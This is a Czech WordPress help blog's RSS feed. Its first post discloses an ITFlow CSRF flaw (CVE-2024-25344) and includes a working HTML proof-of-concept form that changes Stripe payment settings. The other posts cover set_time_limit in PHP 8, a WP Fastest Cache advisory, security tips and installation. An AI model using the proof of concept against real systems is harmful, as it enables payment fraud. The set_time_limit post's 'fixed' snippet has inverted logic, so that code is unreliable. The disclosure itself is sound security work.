<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>WP Pomoc</title>
	<atom:link href="https://wp-pomoc.cz/feed/" rel="self" type="application/rss+xml" />
	<link>https://wp-pomoc.cz/</link>
	<description>Zrychlujeme, opravujeme a vylepšujeme weby. WordPress pomoc s bleskovou rychlostí.</description>
	<lastBuildDate>Wed, 21 Feb 2024 18:43:45 +0000</lastBuildDate>
	<language>cs</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.9.4</generator>

<image>
	<url>https://wp-pomoc.cz/wp-content/uploads/2023/07/icon-blue-150x150.png</url>
	<title>WP Pomoc</title>
	<link>https://wp-pomoc.cz/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>ITFlow CSRF zranitelnost CVE-2024-25344</title>
		<link>https://wp-pomoc.cz/itflow-csrf-zranitelnost-cve-2024-25344/</link>
		
		<dc:creator><![CDATA[wp-pomoc]]></dc:creator>
		<pubDate>Wed, 21 Feb 2024 18:41:18 +0000</pubDate>
				<category><![CDATA[Zranitelnosti]]></category>
		<guid isPermaLink="false">https://wp-pomoc.cz/?p=15215</guid>

					<description><![CDATA[<p>ITFlow zranitelnost (CVE-2024-25344) Ačkoliv naší pomoc zaměřujeme na systém WordPress, nejvíce se naše společnost zabývá vývojem zakázkového software a jeho provozu. V průběhu posledního čtvrtletí roku 2023 jsme pro naše klienty nasazovali open-source systém pro ticketing a správu klientů ITFlow. Při nasazování a nastavování, jsme kvůli několika nedokonalostem v dokumentaci zamířili pro informace přímo do [&#8230;]</p>
<p>Článek <a href="https://wp-pomoc.cz/itflow-csrf-zranitelnost-cve-2024-25344/">ITFlow CSRF zranitelnost CVE-2024-25344</a> se nejdříve objevil na <a href="https://wp-pomoc.cz">WP Pomoc</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<h2 class="wp-block-heading">ITFlow zranitelnost (CVE-2024-25344)</h2>



<p>Ačkoliv naší pomoc zaměřujeme na systém WordPress, nejvíce se naše společnost zabývá vývojem zakázkového software a jeho provozu. V průběhu posledního čtvrtletí roku 2023 jsme pro naše klienty nasazovali open-source systém pro ticketing a správu klientů <a href="https://itflow.org">ITFlow</a>. </p>



<p>Při nasazování a nastavování, jsme kvůli několika nedokonalostem v dokumentaci zamířili pro informace přímo do zdrojového kódu. V něm jsme identifikovali potenciální problém, kdy pro klíčové změny systému nedocházelo k využívání CSRF tokenů.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>Zranitelnost typu <strong>Cross Site Request Forgery (CSRF)</strong> se vyznačuje tím, že dochází ke zneužití aktuálního přihlášení uživatele v nějaké aplikaci, kdy bez jeho vědomí, v rámci jeho přihlášení, dochází k odesílání požadavků do zranitelné aplikace. Často tak dochází např. k nevyžádané změně hesla účtu atd.</p>
</blockquote>



<p>Pro otestování naší hypotézy jsme sestavili PoC (Proof of concept) a vyzkoušeli na lokální verzi, zda se zranitelnost skutečně v testovaném software nachází. </p>



<h2 class="wp-block-heading">CVE-2024-25344</h2>



<p>Software ITFlow měl zranitelnou sekci pro nastavení systému, konkrétně endpoint <em>post.php</em>, který využívá pro zpracovávání formulářů. Zde absentovala kontrola vygenerovaných CSRF tokenů, které jsou běžnou obranou před zranitelností CSRF. </p>



<p>Po exploitování této zranitelnosti se nám <strong>podařilo změnit nastavení platební brány Stripe</strong>, kterou určitě velká většina WordPressáků zná, případně se nám podařilo upravit nastavení <strong>Microsoft Azure SSO</strong>. Výsledkem je pro útočníka možnost nastavit systém tak, aby veškeré platby skrze systém ITFlow a bránu Stripe obdržel on.</p>



<h3 class="wp-block-heading">PoC</h3>



<p>Protože již byla zranitelnost v kooperaci s vývojáři opravena, zveřejňujeme tuto zprávu a náš PoC, pro zranitelné verze systému. Zranitelné jsou všechny instance ITFlow před commitem <a href="https://github.com/itflow-org/itflow/commit/432488eca3998c5be6b6b9e8f8ba01f54bc12378" target="_blank" rel="noreferrer noopener">432488eca3998c5be6b6b9e8f8ba01f54bc12378</a>.</p>



<pre class="wp-block-code"><code>&lt;html>
&lt;form enctype="multipart/form-data" method="POST" action="https://itflow.example.com/post.php">
    &lt;table>
        &lt;tr>&lt;td>edit_online_payment_settings&lt;/td>&lt;td>&lt;input type="text" value="" name="edit_online_payment_settings">&lt;/td>&lt;/tr>
        &lt;tr>&lt;td>config_stripe_enable&lt;/td>&lt;td>&lt;input type="text" value="1" name="config_stripe_enable">&lt;/td>&lt;/tr>
        &lt;tr>&lt;td>config_stripe_publishable&lt;/td>&lt;td>&lt;input type="text" value="csrf-poc" name="config_stripe_publishable">&lt;/td>&lt;/tr>
        &lt;tr>&lt;td>config_stripe_secret&lt;/td>&lt;td>&lt;input type="text" value="csrf-poc-secret" name="config_stripe_secret">&lt;/td>&lt;/tr>
        &lt;tr>&lt;td>config_stripe_account&lt;/td>&lt;td>&lt;input type="text" value="1" name="config_stripe_account">&lt;/td>&lt;/tr>
    &lt;/table>
    &lt;input type="submit" value="https://itflow.example.com/post.php">
&lt;/form>
&lt;/html></code></pre>



<ul class="wp-block-list">
<li>Systém ITFlow &#8211; <a href="https://itflow.org" target="_blank" rel="noreferrer noopener">itflow.org</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-25344" target="_blank" rel="noreferrer noopener">NIST CVE-2024-25344</a></li>



<li><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25344" target="_blank" rel="noreferrer noopener">MITRE CVE-2024-25344</a></li>



<li><a href="https://packetstormsecurity.com/files/177224/ITFlow-Cross-Site-Request-Forgery.html" target="_blank" rel="noreferrer noopener">PacketStormSecurity CVE-2024-25344</a></li>



<li><a href="https://github.com/itflow-org/itflow/commit/432488eca3998c5be6b6b9e8f8ba01f54bc12378" target="_blank" rel="noreferrer noopener">https://github.com/itflow-org/itflow/commit/432488eca3998c5be6b6b9e8f8ba01f54bc12378</a></li>



<li><a href="https://github.com/itflow-org/itflow/commit/8068cb6081e4760860a634c1066b2c64d0ee2d46" target="_blank" rel="noreferrer noopener">https://github.com/itflow-org/itflow/commit/8068cb6081e4760860a634c1066b2c64d0ee2d46</a></li>
</ul>
<p>Článek <a href="https://wp-pomoc.cz/itflow-csrf-zranitelnost-cve-2024-25344/">ITFlow CSRF zranitelnost CVE-2024-25344</a> se nejdříve objevil na <a href="https://wp-pomoc.cz">WP Pomoc</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>PHP funkce set_time_limit a její problémy u hostingů</title>
		<link>https://wp-pomoc.cz/php-funkce-set_time_limit-a-jeji-problemy-u-hostingu/</link>
		
		<dc:creator><![CDATA[wp-pomoc]]></dc:creator>
		<pubDate>Mon, 12 Feb 2024 16:59:28 +0000</pubDate>
				<category><![CDATA[PHP]]></category>
		<category><![CDATA[WordPress]]></category>
		<guid isPermaLink="false">https://wp-pomoc.cz/?p=15212</guid>

					<description><![CDATA[<p>Valná většina uživatelů systému WordPress ani neví, že nějaká taková funkce existuje. Není divu, ona se totiž až do verze PHP 8 chovala velice nenápadně, ale využívána je opravdu často. Upravuje totiž dobu, po kterou se může vykonávat PHP skript. V nastavení PHP existuje možnost zakázat volání nějaké funkce z bezpečnostních, nebo i jiných důvodů [&#8230;]</p>
<p>Článek <a href="https://wp-pomoc.cz/php-funkce-set_time_limit-a-jeji-problemy-u-hostingu/">PHP funkce set_time_limit a její problémy u hostingů</a> se nejdříve objevil na <a href="https://wp-pomoc.cz">WP Pomoc</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Valná většina uživatelů systému <a href="https://wordpress.org" target="_blank" rel="noreferrer noopener">WordPress</a> ani neví, že nějaká taková funkce existuje. Není divu, ona se totiž až do verze PHP 8 chovala velice nenápadně, ale využívána je opravdu často. Upravuje totiž dobu, po kterou se může vykonávat PHP skript.</p>



<p>V nastavení PHP existuje možnost zakázat volání nějaké funkce z bezpečnostních, nebo i jiných důvodů s pomocí direktivy <em>disable_functions</em>. Po tomto nastavení často šahají sdílené webhostingy, protože například v případě funkce <em>set_time_limit</em> by mohlo dojít k většímu vytěžování zdrojů serveru na úkor ostatních webů na daném webhostingu. </p>



<p>Pokud jsme v případě PHP 7 a starších verzí zavolali zakázanou funkci, dostali jsme warning s následující hláškou.  </p>



<pre class="wp-block-code"><code>Warning: set_time_limit() has been disabled for security reasons in ... on line ...</code></pre>



<p>Protože se jedná pouze o warning, bylo možné tuto hlášku potlačit pomocí zavináče (@) a pokračovat dál, jako by se nic nestalo. Lze proto ve starších verzích WordPressu, Joomly a různých pluginů narazit na následující volání.</p>



<pre class="wp-block-code"><code>@set_time_limit(0);</code></pre>



<p>Tento (značně lenivý) přístup pak změnil příchod PHP 8, kdy byl tento vcelku neškodný warning povýšen na error a začaly se dít věci. Tato funkce je totiž často užívána v případech, kdy dochází k nějakému AJAXovému volání. Uživatel často ani nepozná problém. Jedinou indicií je většinou pouze načítací obrazovka, která nikdy nezmizí.</p>



<pre class="wp-block-code"><code>Fatal error: Uncaught Error: Call to undefined function set_time_limit() in ...:...</code></pre>



<p>Pro populární systémy přišlo řešení vcelku rychle. Můžeme se totiž dotázat, jestli funkce existuje a až poté ji v případě splnění podmínky zavolat. Jednoduché že? Problém je v tom, že ačkoliv jádra těchto systémů aktualizaci s následujícím kódem obdržela, valná většina pluginů a komunitního kódu již ne.</p>



<pre class="wp-block-code"><code>if (!function_exists('set_time_limit')) {
    set_time_limit(0);
}</code></pre>



<p>Najednou se tedy dostáváme do stavu, kdy část systémů funguje s pomocí výše popsaného opraveného kódu a část padá, protože obsahuje již zastaralý workaround. Jako řešení se tedy nabízí polyfill této metody a to nám i nová verze PHP 8 dovoluje! V minulých verzích to možné nebylo, protože na zakázanou funkci nebylo nahlíženo stejně jako na neexistující. Sama <a href="https://www.php.net/manual/en/migration80.incompatible.php" target="_blank" rel="noreferrer noopener">dokumentace PHP</a> zmiňuje tuto změnu následovně: <em>&#8222;Disabled functions are now treated exactly like non-existent functions. Calling a disabled function will report it as unknown, and redefining a disabled function is now possible.&#8220;</em>.</p>



<pre class="wp-block-code"><code>// Jednoduchý polyfill pro PHP 8
if (!function_exists('set_time_limit')) {
    function set_time_limit($sec) {
        return false; // Vracíme informaci o tom, že volání selhalo.
    }
}</code></pre>



<p>A fungovat nám to najednou bude krásně! Ale jen pro PHP 8. Pokud tento kód zkusíme spustit ve starších verzích PHP, selže. Příčinou je právě výskyt zakázané funkce v seznamu definovaných funkcí a výsledkem je tak chyba s informací, že nemůžeme funkci deklarovat vícekrát.</p>



<pre class="wp-block-code"><code>Fatal error: Cannot redeclare set_time_limit() in ... on line ...</code></pre>



<p>Protože nám <em>function_exists</em> pro vypnutou funkci napříč verzemi PHP vrátí false, musíme nějak toto volání omezit na PHP verze 8. S pomocí <em>PHP_VERSION</em> a <em>version_compare()</em> je to vcelku triviální. Výsledný kód, který bude problém řešit napříč verzemi by mohl vypadat následovně:</p>



<pre class="wp-block-code"><code>if (!function_exists('set_time_limit') &amp;&amp; version_compare(PHP_VERSION, '8.0.0', '>=')) {
    function set_time_limit($sec) {
        return false; // Vracíme informaci o tom, že volání selhalo.
    }
}</code></pre>



<p>V případě WordPressu pak můžeme tuto funkci vložit např. do souboru wp-config.php a tím vyřešit problém s voláním zakázené funkce, který by nám mohl shazovat nejčastěji cron a AJAX volání.</p>



<h2 class="wp-block-heading">Potřebujete pomoc?</h2>



<p>Neváhejte a napište nám! Web s vámi nainstalujeme, nastavíme a zabezpečíme. Vy se nemusíte o nic starat. Stačí vyplnit náš&nbsp;<a href="https://wp-pomoc.cz/kontakt/">kontaktní formulář</a>&nbsp;nebo se nám ozvat na&nbsp;<a href="https://wp-pomoc.cz/jak-zacit-s-wordpressem-pruvodce-pro-zacatecniky/info@wp-pomoc.cz">info@wp-pomoc.cz</a>.</p>
<p>Článek <a href="https://wp-pomoc.cz/php-funkce-set_time_limit-a-jeji-problemy-u-hostingu/">PHP funkce set_time_limit a její problémy u hostingů</a> se nejdříve objevil na <a href="https://wp-pomoc.cz">WP Pomoc</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>WP Fastest Cache kritická zranitelnost</title>
		<link>https://wp-pomoc.cz/wp-fastest-cache-kriticka-zranitelnost/</link>
		
		<dc:creator><![CDATA[wp-pomoc]]></dc:creator>
		<pubDate>Tue, 21 Nov 2023 10:14:02 +0000</pubDate>
				<category><![CDATA[Zranitelnosti]]></category>
		<guid isPermaLink="false">https://wp-pomoc.cz/?p=15200</guid>

					<description><![CDATA[<p>V rámci populárního pluginu WP Fastest Cache ve verzích do 1.2.2 byla objevena nová zranitelnost s hodnocením CVSS 9,8 z 10, tedy kritická. Jedná se o zranitelnost typu SQL Injection, která umožňuje nepřihlášenému útočníkovi pomocí cookie, jejíž hodnota je následně nedostatečně ošetřena, získat veškerá data z databáze případně ji i smazat. Pokud uchováváte osobní údaje, [&#8230;]</p>
<p>Článek <a href="https://wp-pomoc.cz/wp-fastest-cache-kriticka-zranitelnost/">WP Fastest Cache kritická zranitelnost</a> se nejdříve objevil na <a href="https://wp-pomoc.cz">WP Pomoc</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>V rámci populárního pluginu <a href="https://wordpress.org/plugins/wp-fastest-cache/" target="_blank" rel="noreferrer noopener">WP Fastest Cache</a> ve verzích do 1.2.2 byla objevena nová zranitelnost s hodnocením CVSS 9,8 z 10, tedy <strong>kritická</strong>. Jedná se o zranitelnost typu SQL Injection, která umožňuje nepřihlášenému útočníkovi pomocí cookie, jejíž hodnota je následně nedostatečně ošetřena, získat veškerá data z databáze případně ji i smazat.</p>



<p>Pokud uchováváte osobní údaje, mohlo dojít k jejich úniku. Analyzujte proto prosím svůj web jestli k němu opravdu nedošlo. Mohla vám tak vzniknout ohlašovací povinnost vůči regulátorovi.</p>



<p>Pro naše klienty jsme problém okamžitě vyřešili a jejich weby aktualizovali na nejnovější verze. Pokud chcete i vy takový servis, neváhejte nás kontaktovat <a href="https://wp-pomoc.cz/kontakt/">zde</a>, nebo nám napište na <a href="mailto:info@wp-pomoc.cz">info@wp-pomoc.cz</a>.</p>
<p>Článek <a href="https://wp-pomoc.cz/wp-fastest-cache-kriticka-zranitelnost/">WP Fastest Cache kritická zranitelnost</a> se nejdříve objevil na <a href="https://wp-pomoc.cz">WP Pomoc</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>10 tipů pro bezpečný WordPress web</title>
		<link>https://wp-pomoc.cz/10-tipu-pro-bezpecny-wordpress-web/</link>
		
		<dc:creator><![CDATA[wp-pomoc]]></dc:creator>
		<pubDate>Sun, 16 Jul 2023 15:50:45 +0000</pubDate>
				<category><![CDATA[Bezpečnost]]></category>
		<category><![CDATA[Tipy]]></category>
		<category><![CDATA[WordPress]]></category>
		<guid isPermaLink="false">https://wp-pomoc.cz/?p=15179</guid>

					<description><![CDATA[<p>Bezpečnost je jedním z nejdůležitějších aspektů při vytváření a provozování webových stránek postavených na CMS WordPress. S neustále se zvyšujícím počtem kybernetických hrozeb je důležité chránit svůj web a udržovat citlivá data v bezpečí. V tomto článku se zaměříme na 10 tipů, které vám pomohou vytvořit bezpečnější WordPress web. Je potřeba si uvědomit, že velké [&#8230;]</p>
<p>Článek <a href="https://wp-pomoc.cz/10-tipu-pro-bezpecny-wordpress-web/">10 tipů pro bezpečný WordPress web</a> se nejdříve objevil na <a href="https://wp-pomoc.cz">WP Pomoc</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Bezpečnost je jedním z nejdůležitějších aspektů při vytváření a provozování webových stránek postavených na CMS WordPress. S neustále se zvyšujícím počtem kybernetických hrozeb je důležité chránit svůj web a udržovat citlivá data v bezpečí. V tomto článku se zaměříme na 10 tipů, které vám pomohou vytvořit bezpečnější WordPress web. Je potřeba si uvědomit, že velké množství webů na světě běží na systému WordPress, útoky na každý takový web probíhají každý den.</p>



<h2 class="wp-block-heading">1. Aktualizace</h2>



<p>Pravidelné aktualizace jsou zásadní pro udržení bezpečnosti vašeho WordPress webu. Nezapomeňte pravidelně kontrolovat dostupné aktualizace a zajistěte, aby byl váš systém, šablony a pluginy vždy aktualizovány na nejnovější verzi.</p>



<h2 class="wp-block-heading">2. Silné heslo</h2>



<p>Jednoduchá hesla jsou snadným cílem pro útočníky. Zvolte silné heslo obsahující kombinaci velkých a malých písmen, číslic a speciálních znaků. Důležité je používat unikátní heslo pro každý účet na webu.</p>



<h2 class="wp-block-heading">3. Ochrana před útoky hrubou silou</h2>



<p>Zabezpečte svůj WordPress web proti útokům hrubou silou omezením počtu neúspěšných pokusů o přihlášení. Můžete použít pluginy, které omezí počet pokusů a dočasně blokují IP adresy s podezřelou aktivitou.</p>



<h2 class="wp-block-heading">4. Volba hostingu</h2>



<p>Volba spolehlivého a bezpečného hostingového poskytovatele je klíčová. Zajistěte si, že váš hostingový poskytovatel poskytuje bezpečnostní opatření, jako je například aktualizace softwaru, zabezpečení proti útokům DDoS a zálohování dat.</p>



<h2 class="wp-block-heading">5. Dvoufaktorová autentizace (2FA)</h2>



<p>Aktivujte dvoufaktorovou autentizaci pro přihlášení na váš WordPress web. Toto rozšíření zpřísňuje zabezpečení tím, že vyžaduje kromě hesla také druhý ověřovací faktor, jako je například SMS kód nebo ověřovací aplikace.</p>



<h2 class="wp-block-heading">6. Zálohování dat</h2>



<p>Pravidelně zálohujte svá data, včetně obsahu webu, databáze a souborů. V případě útoku nebo jiného incidentu budete mít možnost obnovit svůj web z poslední dostupné zálohy.</p>



<h2 class="wp-block-heading">7. Bezpečnostní pluginy</h2>



<p>Existuje mnoho bezpečnostních pluginů, které mohou posílit ochranu vašeho WordPress webu. Nainstalujte a aktivujte pluginy, které nabízejí funkcionalitu jako detekce a blokování podezřelých aktivit, firewall, kontrola škodlivých kódů a další.</p>



<h2 class="wp-block-heading">8. Skryjte verzi WordPress</h2>



<p>Neprezentujte veřejně verzi WordPressu, kterou používáte na svém webu. Útočníci mohou využít informace o verzi pro cílení na známé zranitelnosti. Použijte plugin nebo upravte soubor .htaccess, čímž skryjete informace o verzi. Nezapomeňte na README soubory, ve kterých je verze taktéž obsažena.</p>



<h2 class="wp-block-heading">9. XML-RPC</h2>



<p>WordPress používá XML-RPC pro komunikaci s webovými službami a umožňuje vzdálené publikování příspěvků, aktualizaci obsahu a provádění dalších operací prostřednictvím API. Jedním z hlavních bezpečnostních problémů XML-RPC je zvýšené riziko útoků hrubou silou a jejich intenzity. Zároveň lze skrze XML-RPC odhalit citlivé informace. Zakažte XML-RPC na vašem webu.</p>



<h2 class="wp-block-heading">10. Monitorování bezpečnosti</h2>



<p>Pravidelně monitorujte svůj WordPress web pomocí nástrojů pro detekci bezpečnostních hrozeb. Tyto nástroje vám mohou poskytnout upozornění na podezřelou aktivitu, například neautorizované změny nebo pokusy o prolomení zabezpečení.</p>



<h2 class="wp-block-heading">Potřebujete pomoc?</h2>



<p>Neváhejte a napište nám! Web s vámi nainstalujeme, nastavíme a zabezpečíme. Vy se nemusíte o nic starat. Stačí vyplnit náš&nbsp;<a href="https://wp-pomoc.cz/kontakt/">kontaktní formulář</a>&nbsp;nebo se nám ozvat na&nbsp;<a href="https://wp-pomoc.cz/jak-zacit-s-wordpressem-pruvodce-pro-zacatecniky/info@wp-pomoc.cz">info@wp-pomoc.cz</a>.</p>
<p>Článek <a href="https://wp-pomoc.cz/10-tipu-pro-bezpecny-wordpress-web/">10 tipů pro bezpečný WordPress web</a> se nejdříve objevil na <a href="https://wp-pomoc.cz">WP Pomoc</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Jak začít s WordPressem &#8211; Průvodce pro začátečníky</title>
		<link>https://wp-pomoc.cz/jak-zacit-s-wordpressem-pruvodce-pro-zacatecniky/</link>
		
		<dc:creator><![CDATA[wp-pomoc]]></dc:creator>
		<pubDate>Tue, 04 Jul 2023 14:24:16 +0000</pubDate>
				<category><![CDATA[Instalace]]></category>
		<category><![CDATA[WordPress]]></category>
		<guid isPermaLink="false">https://wp-pomoc.cz/?p=15119</guid>

					<description><![CDATA[<p>WordPress je jednou z nejpoužívanějších a nejoblíbenějších platform pro správu obsahu (CMS) na internetu. Jeho jednoduchost a rozšiřitelnost přitahují miliony uživatelů po celém světě. Pokud se chystáte vytvořit vlastní webovou stránku nebo blog pomocí WordPressu, následující průvodce vám poskytne kroky potřebné k jeho zprovoznění a instalaci. Vyberte si hostingovou službu Pro zprovoznění a následný provoz [&#8230;]</p>
<p>Článek <a href="https://wp-pomoc.cz/jak-zacit-s-wordpressem-pruvodce-pro-zacatecniky/">Jak začít s WordPressem &#8211; Průvodce pro začátečníky</a> se nejdříve objevil na <a href="https://wp-pomoc.cz">WP Pomoc</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>WordPress je jednou z nejpoužívanějších a nejoblíbenějších platform pro správu obsahu (CMS) na internetu. Jeho jednoduchost a rozšiřitelnost přitahují miliony uživatelů po celém světě. Pokud se chystáte vytvořit vlastní webovou stránku nebo blog pomocí WordPressu, následující průvodce vám poskytne kroky potřebné k jeho zprovoznění a instalaci.</p>



<h2 class="wp-block-heading">Vyberte si hostingovou službu</h2>



<p>Pro zprovoznění  a následný provoz WordPressu na vaší webové stránce budete potřebovat hostingovou službu, která vám poskytne místo pro umístění vašich souborů a databáze. Existuje mnoho hostingových společností, které nabízejí služby specificky pro WordPress. V čechách je nejběžnější například Wedos, Web Support a další. Zaregistrujte se u nich, vyberte si službu a zaplaťte za hosting.</p>



<h2 class="wp-block-heading">Vyberte si doménu</h2>



<p>Doména je adresa vašeho webu na internetu (například <a href="https://wp-pomoc.cz">wp-pomoc.cz</a>). Většina hostingových společností vám také nabízí možnost zakoupit doménu přímo u nich. Zvolte si vhodnou doménu, která je jednoduchá, snadno zapamatovatelná a co nejvíce odpovídá obsahu vašeho webu.</p>



<h2 class="wp-block-heading">Instalace WordPressu</h2>



<h3 class="wp-block-heading">Automatická instalace</h3>



<p>Většina moderních hostingových služeb má jednoduchý a automatizovaný proces instalace WordPressu. Po přihlášení do svého účtu na hostingové platformě se obvykle dostanete na ovládací panel. Zde byste měli najít sekci nebo nástroj pro instalaci WordPressu. Zvolte tuto možnost a postupujte podle pokynů na obrazovce. Obvykle budete muset zadat název domény, vytvořit uživatelské jméno a heslo pro administrátorský účet WordPressu a potvrdit instalaci.</p>



<h3 class="wp-block-heading">Manuální instalace</h3>



<p>Prvním krokem je stáhnout nejnovější verzi WordPressu ze oficiálního webu <a href="https://WordPress.org">WordPress.org</a>. Na domovské stránce najdete možnost &#8222;Stáhnout WordPress&#8220;. Klikněte na tuto možnost a uložte soubor ZIP na svůj počítač.</p>



<p>Po stažení WordPressu extrahujte obsah souboru ZIP do složky na vašem počítači. Získáte tak adresář s názvem &#8222;wordpress&#8220;, který obsahuje všechny potřebné soubory pro WordPress</p>



<p>Před instalací WordPressu budete potřebovat prázdnou MySQL databázi. Přihlaste se do svého hostingového účtu a přejděte do sekce databází. Vytvořte novou databázi a zaznamenejte si název databáze, uživatelské jméno a heslo.</p>



<p>Pro přenos souborů na váš hostingový účet budete potřebovat FTP klienta. Existuje mnoho zdarma dostupných FTP klientů, jako například FileZilla. Stáhněte si FTP klienta a připojte se k vašemu hostingovému účtu pomocí poskytnutých přihlašovacích údajů (hostingová adresa, uživatelské jméno, heslo).</p>



<p>Ve vašem FTP klientovi najděte složku na vašem serveru, kam chcete nahrát soubory WordPressu. Obvykle se jedná o složku s názvem &#8222;public_html&#8220; nebo &#8222;www&#8220;. Přetáhněte všechny soubory a složky z adresáře &#8222;wordpress&#8220; (který jste extrahovali ve druhém kroku) do příslušné složky na serveru.</p>



<p>Ve složce na serveru najděte soubor s názvem &#8222;wp-config-sample.php&#8220; a přejmenujte ho na &#8222;wp-config.php&#8220;. Otevřete tento soubor v textovém editoru a upravte následující řádky:</p>



<pre class="wp-block-code"><code>define('DB_NAME', 'nazev_vase_databaze');
define('DB_USER', 'vase_databazove_jmeno');
define('DB_PASSWORD', 'vase_databazove_heslo');
define('DB_HOST', 'adresa_databazoveho_serveru');</code></pre>



<p>Zde nahraďte &#8222;nazev_vase_databaze&#8220; názvem vaší vytvořené MySQL databáze, &#8222;vase_databazove_jmeno&#8220; uživatelským jménem pro přístup k databázi a &#8222;vase_databazove_heslo&#8220; příslušným heslem. V případě, že je databázový server na stejném stroji jako webový server, lze použít jako jeho adresu &#8222;localhost&#8220; případně 127.0.0.1.</p>



<p>Poté, co jste provedli všechny předchozí kroky, můžete spustit instalační proces WordPressu pomocí webového prohlížeče. Přejděte na adresu vašeho webu (například <a href="https://wp-pomoc.cz" data-type="URL" data-id="https://wp-pomoc.cz">wp-pomoc.cz</a>) a měli byste být přesměrováni na stránku pro instalaci WordPressu. Postupujte podle pokynů na obrazovce a vyplňte požadované informace, včetně názvu webu, uživatelského jména a hesla pro administrátorský účet WordPressu.</p>



<p>Po dokončení instalačního procesu budete mít plně funkční WordPress webovou stránku. Můžete se přihlásit do administračního rozhraní pomocí zvoleného uživatelského jména a hesla a začít přizpůsobovat vzhled a funkcionalitu WordPressu pomocí široké škály dostupných motivů (themes) a rozšíření (plugins).</p>



<h2 class="wp-block-heading">Potřebujete pomoc?</h2>



<p>Neváhejte a napište nám! Web s vámi nainstalujeme, nastavíme a zabezpečíme. Vy se nemusíte o nic starat. Stačí vyplnit náš <a href="https://wp-pomoc.cz/kontakt/" data-type="page" data-id="2743">kontaktní formulář</a> nebo se nám ozvat na <a href="info@wp-pomoc.cz">info@wp-pomoc.cz</a>.</p>
<p>Článek <a href="https://wp-pomoc.cz/jak-zacit-s-wordpressem-pruvodce-pro-zacatecniky/">Jak začít s WordPressem &#8211; Průvodce pro začátečníky</a> se nejdříve objevil na <a href="https://wp-pomoc.cz">WP Pomoc</a>.</p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
